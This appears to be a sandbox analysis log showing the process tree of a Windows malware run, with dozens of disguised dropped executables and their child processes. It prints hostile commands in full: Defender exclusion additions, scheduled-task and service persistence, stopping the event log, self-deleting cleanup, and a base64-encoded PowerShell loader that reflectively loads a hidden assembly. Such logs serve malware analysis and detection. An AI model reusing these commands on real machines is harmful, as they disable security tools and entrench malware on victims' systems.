C:\Users\Admin\AppData\Local\Temp\u1og.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1og.1.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1060

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
4⤵
PID:4724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 984
3⤵
- Program crash
PID:2896

C:\Users\Admin\AppData\Local\Temp\a\test2.exe
"C:\Users\Admin\AppData\Local\Temp\a\test2.exe"
2⤵
- Executes dropped EXE
PID:4896

C:\Users\Admin\AppData\Local\Temp\a\1111.exe
"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"
2⤵
- Executes dropped EXE
PID:828

C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2776

C:\Users\Admin\AppData\Local\Temp\u254.0.exe
"C:\Users\Admin\AppData\Local\Temp\u254.0.exe"
3⤵
- Executes dropped EXE
PID:1844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 1096
4⤵
- Program crash
PID:4108

C:\Users\Admin\AppData\Local\Temp\a\Tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
3⤵
PID:4868

C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3848

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
3⤵
- Creates scheduled task(s)
PID:4388

C:\Users\Admin\AppData\Local\Temp\a\555.exe
"C:\Users\Admin\AppData\Local\Temp\a\555.exe"
2⤵
PID:4804

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
2⤵
PID:704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
PID:3560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
3⤵
PID:2396

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFB43.tmp"
3⤵
- Creates scheduled task(s)
PID:4540

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
PID:5144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit
4⤵
PID:5216

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'
5⤵
- Creates scheduled task(s)
PID:5500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp13BD.tmp.bat""
4⤵
PID:5280

C:\Windows\SysWOW64\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:5532

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
5⤵
PID:1536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
PID:5428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
6⤵
PID:5516

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp863D.tmp"
6⤵
- Creates scheduled task(s)
PID:3292

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
PID:1580

C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe
"C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"
2⤵
PID:4568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe'
3⤵
PID:1240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BrawlB0t.exe'
3⤵
PID:2476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
3⤵
PID:4240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
3⤵
PID:5732

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
3⤵
- Creates scheduled task(s)
PID:3880

C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe
"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
2⤵
PID:3836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
3⤵
PID:2800

C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe
"C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"
2⤵
PID:5116

C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"
2⤵
PID:2072

C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"
2⤵
PID:4124

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 828
3⤵
- Program crash
PID:1640

C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe
"C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"
2⤵
PID:5600

C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"
2⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"
2⤵
PID:5416

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4584

C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
4⤵
PID:4924

C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
4⤵
PID:5424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:6084

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:2020

C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe
"C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"
2⤵
PID:5500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1096
3⤵
- Program crash
PID:5980

C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
"C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"
2⤵
PID:4556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
3⤵
PID:5928

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
4⤵
- Runs ping.exe
PID:5504

C:\Users\Admin\AppData\Local\Temp\a\1111.exe
"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"
2⤵
PID:2672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 168
3⤵
- Program crash
PID:5376

C:\Users\Admin\AppData\Local\Temp\a\new1.exe
"C:\Users\Admin\AppData\Local\Temp\a\new1.exe"
2⤵
PID:1872

C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"
2⤵
PID:5408

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4076

C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"
2⤵
PID:5664

C:\Users\Admin\AppData\Local\Temp\u4dc.0.exe
"C:\Users\Admin\AppData\Local\Temp\u4dc.0.exe"
3⤵
PID:5488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 1296
4⤵
- Program crash
PID:3720

C:\Users\Admin\AppData\Local\Temp\u4dc.1.exe
"C:\Users\Admin\AppData\Local\Temp\u4dc.1.exe"
3⤵
PID:5536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5664 -s 1580
3⤵
- Program crash
PID:312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5664 -s 1704
3⤵
- Program crash
PID:5376

C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
"C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
2⤵
PID:5328

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
3⤵
PID:776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 592
4⤵
- Program crash
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 1136
3⤵
- Program crash
PID:232

C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"
2⤵
PID:5892

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 804
3⤵
- Program crash
PID:5184

C:\Users\Admin\AppData\Local\Temp\a\june.exe
"C:\Users\Admin\AppData\Local\Temp\a\june.exe"
2⤵
PID:6056

C:\Users\Admin\AppData\Local\Temp\is-8JIFS.tmp\june.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8JIFS.tmp\june.tmp" /SL5="$1C006A,4053053,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"
3⤵
PID:5568

C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -i
4⤵
PID:5820

C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -s
4⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"
2⤵
PID:5272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5856

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5848

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5272 -s 804
3⤵
- Program crash
PID:2936

C:\Users\Admin\AppData\Local\Temp\a\new.exe
"C:\Users\Admin\AppData\Local\Temp\a\new.exe"
2⤵
PID:1404

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4648

C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe
"C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"
2⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\a\123p.exe
"C:\Users\Admin\AppData\Local\Temp\a\123p.exe"
2⤵
PID:5536

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
PID:4284

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
PID:1812

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
PID:4508

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
PID:2576

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBGPQMHF"
3⤵
- Launches sc.exe
PID:5904

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
3⤵
- Launches sc.exe
PID:5048

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:3432

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBGPQMHF"
3⤵
- Launches sc.exe
PID:3364

C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe
"C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"
2⤵
PID:5280

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
3⤵
PID:5496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "
4⤵
PID:2408

C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe
"C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"
5⤵
PID:1060

C:\BlockComponentwebMonitordhcp\powershell.exe
"C:\BlockComponentwebMonitordhcp\powershell.exe"
6⤵
PID:5804

C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"
2⤵
PID:6132

C:\Users\Admin\AppData\Local\Temp\u4qc.0.exe
"C:\Users\Admin\AppData\Local\Temp\u4qc.0.exe"
3⤵
PID:2944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 1372
4⤵
- Program crash
PID:3900

C:\Users\Admin\AppData\Local\Temp\u4qc.1.exe
"C:\Users\Admin\AppData\Local\Temp\u4qc.1.exe"
3⤵
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 1524
3⤵
- Program crash
PID:320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 1176
3⤵
- Program crash
PID:5480

C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe
"C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"
2⤵
PID:5924

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
3⤵
PID:5936

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
3⤵
PID:5376

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
3⤵
PID:3476

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
4⤵
- Creates scheduled task(s)
PID:5812

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
3⤵
PID:2608

C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"
2⤵
PID:4492

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:5400

C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe
"C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe"
3⤵
PID:1612

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:5968

C:\Users\Admin\AppData\Local\Temp\a\crypt.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"
2⤵
PID:3368

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
3⤵
PID:5908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
4⤵
PID:5436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"
5⤵
PID:2768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"
5⤵
PID:3412

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:5556

C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe
"C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"
2⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"
2⤵
PID:5820

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 824
3⤵
- Program crash
PID:4816

C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe
"C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"
2⤵
PID:2180

C:\Users\Admin\AppData\Local\Temp\ckz_5Y3H\nds.exe
"C:\Users\Admin\AppData\Local\Temp\ckz_5Y3H\nds.exe"
3⤵
PID:5480

C:\Users\Admin\AppData\Local\Temp\ckz_5Y3H\nds.exe
"C:\Users\Admin\AppData\Local\Temp\ckz_5Y3H\nds.exe"
4⤵
PID:6124

C:\Users\Admin\AppData\Local\Temp\a\garits.exe
"C:\Users\Admin\AppData\Local\Temp\a\garits.exe"
2⤵
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\garits.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\garits.exe' -Force
3⤵
PID:6064

C:\Users\Admin\AppData\Local\Temp\a\current.exe
"C:\Users\Admin\AppData\Local\Temp\a\current.exe"
2⤵
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 412
3⤵
- Program crash
PID:4644

C:\Users\Admin\AppData\Local\Temp\a\test.exe
"C:\Users\Admin\AppData\Local\Temp\a\test.exe"
2⤵
PID:412

C:\Users\Admin\AppData\Local\Temp\a\123.exe
"C:\Users\Admin\AppData\Local\Temp\a\123.exe"
2⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\a\sarra.exe
"C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"
2⤵
PID:5324

